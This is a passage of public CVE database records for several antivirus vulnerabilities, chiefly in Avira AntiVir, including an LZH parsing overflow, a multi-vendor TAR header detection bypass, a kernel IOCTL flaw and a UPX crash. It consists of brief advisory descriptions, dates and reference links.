               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
            },
            {
               name: "avira-antivir-lzh-bo(34551)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
            },
            {
               name: "1018131",
               tags: [
                  "vdb-entry",
                  "x_refsource_SECTRACK",
               ],
               url: "http://securitytracker.com/id?1018131",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-2974",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an \"integer cast around.\"",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
                     refsource: "MISC",
                     url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
                  },
                  {
                     name: "24187",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24187",
                  },
                  {
                     name: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                     refsource: "CONFIRM",
                     url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                  },
                  {
                     name: "ADV-2007-1971",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2007/1971",
                  },
                  {
                     name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                     refsource: "FULLDISC",
                     url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
                  },
                  {
                     name: "36712",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36712",
                  },
                  {
                     name: "2764",
                     refsource: "SREASON",
                     url: "http://securityreason.com/securityalert/2764",
                  },
                  {
                     name: "25417",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25417",
                  },
                  {
                     name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
                  },
                  {
                     name: "avira-antivir-lzh-bo(34551)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
                  },
                  {
                     name: "1018131",
                     refsource: "SECTRACK",
                     url: "http://securitytracker.com/id?1018131",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-2974",
      datePublished: "2007-06-01T01:00:00",
      dateReserved: "2007-05-31T00:00:00",
      dateUpdated: "2024-08-07T13:57:54.858Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1459
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 19:01
Severity ?
Summary
The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html - vendor-advisory, x_refsource_SUSE
http://osvdb.org/80406 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80393 - vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/522005 - mailing-list, x_refsource_BUGTRAQ
http://osvdb.org/80403 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80389 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80391 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80409 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80396 - vdb-entry, x_refsource_OSVDB
https://exchange.xforce.ibmcloud.com/vulnerabilities/74302 - vdb-entry, x_refsource_XF
http://osvdb.org/80392 - vdb-entry, x_refsource_OSVDB
http://www.ieee-security.org/TC/SP2012/program.html - x_refsource_MISC
http://osvdb.org/80390 - vdb-entry, x_refsource_OSVDB
http://www.mandriva.com/security/advisories?name=MDVSA-2012:094 - vendor-advisory, x_refsource_MANDRIVA
http://osvdb.org/80407 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80395 - vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/52623 - vdb-entry, x_refsource_BID
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T19:01:01.248Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "openSUSE-SU-2012:0833",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_SUSE",
                     "x_transferred",
                  ],
                  url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
               },
               {
                  name: "80406",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80406",
               },
               {
                  name: "80393",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80393",
               },
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "80403",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80403",
               },
               {
                  name: "80389",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80389",
               },
               {
                  name: "80391",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80391",
               },
               {
                  name: "80409",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80409",
               },
               {
                  name: "80396",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80396",
               },
               {
                  name: "multiple-av-tar-header-evasion(74302)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
               },
               {
                  name: "80392",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80392",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "80390",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80390",
               },
               {
                  name: "MDVSA-2012:094",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_MANDRIVA",
                     "x_transferred",
                  ],
                  url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
               },
               {
                  name: "80407",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80407",
               },
               {
                  name: "80395",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80395",
               },
               {
                  name: "52623",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/52623",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-01-17T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "openSUSE-SU-2012:0833",
               tags: [
                  "vendor-advisory",
                  "x_refsource_SUSE",
               ],
               url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
            },
            {
               name: "80406",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80406",
            },
            {
               name: "80393",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80393",
            },
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "80403",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80403",
            },
            {
               name: "80389",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80389",
            },
            {
               name: "80391",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80391",
            },
            {
               name: "80409",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80409",
            },
            {
               name: "80396",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80396",
            },
            {
               name: "multiple-av-tar-header-evasion(74302)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
            },
            {
               name: "80392",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80392",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "80390",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80390",
            },
            {
               name: "MDVSA-2012:094",
               tags: [
                  "vendor-advisory",
                  "x_refsource_MANDRIVA",
               ],
               url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
            },
            {
               name: "80407",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80407",
            },
            {
               name: "80395",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80395",
            },
            {
               name: "52623",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/52623",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1459",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "openSUSE-SU-2012:0833",
                     refsource: "SUSE",
                     url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
                  },
                  {
                     name: "80406",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80406",
                  },
                  {
                     name: "80393",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80393",
                  },
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "80403",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80403",
                  },
                  {
                     name: "80389",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80389",
                  },
                  {
                     name: "80391",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80391",
                  },
                  {
                     name: "80409",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80409",
                  },
                  {
                     name: "80396",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80396",
                  },
                  {
                     name: "multiple-av-tar-header-evasion(74302)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
                  },
                  {
                     name: "80392",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80392",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "80390",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80390",
                  },
                  {
                     name: "MDVSA-2012:094",
                     refsource: "MANDRIVA",
                     url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
                  },
                  {
                     name: "80407",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80407",
                  },
                  {
                     name: "80395",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80395",
                  },
                  {
                     name: "52623",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/52623",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1459",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T19:01:01.248Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2008-6962
Vulnerability from cvelistv5
Published
2009-08-13 16:00
Modified
2024-08-07 11:49
Severity ?
Summary
Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T11:49:02.509Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "avira-ioctl-privilege-escalation(46567)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
               },
               {
                  name: "ADV-2008-3130",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2008/3130",
               },
               {
                  name: "32269",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/32269",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2008-11-12T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-08-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "avira-ioctl-privilege-escalation(46567)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
            },
            {
               name: "ADV-2008-3130",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2008/3130",
            },
            {
               name: "32269",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/32269",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2008-6962",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "avira-ioctl-privilege-escalation(46567)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
                  },
                  {
                     name: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
                     refsource: "MISC",
                     url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
                  },
                  {
                     name: "ADV-2008-3130",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2008/3130",
                  },
                  {
                     name: "32269",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/32269",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2008-6962",
      datePublished: "2009-08-13T16:00:00",
      dateReserved: "2009-08-13T00:00:00",
      dateUpdated: "2024-08-07T11:49:02.509Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2007-2972
Vulnerability from cvelistv5
Published
2007-06-01 01:00
Modified
2024-08-07 13:57
Severity ?
Summary
The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:57:54.603Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "avira-antivir-upx-dos(34556)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
               },
               {
                  name: "24187",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24187",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
               },
               {
                  name: "ADV-2007-1971",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2007/1971",
               },
               {
                  name: "36710",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36710",
               },
               {
                  name: "25417",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25417",
               },
               {
                  name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
               },
               {
                  name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
               },
               {
                  name: "1018132",
                  tags: [
                     "vdb-entry",
                     "x_refsource_SECTRACK",
                     "x_transferred",
                  ],
                  url: "http://www.securitytracker.com/id?1018132",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-05-23T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "avira-antivir-upx-dos(34556)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
            },
            {
               name: "24187",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24187",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
            },
            {
               name: "ADV-2007-1971",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2007/1971",
            },
            {
               name: "36710",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36710",
            },
            {
               name: "25417",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25417",
            },
            {
               name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
            },
            {
               name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
            },
            {
               name: "1018132",
               tags: [
                  "vdb-entry",
                  "x_refsource_SECTRACK",
               ],
               url: "http://www.securitytracker.com/id?1018132",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-2972",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
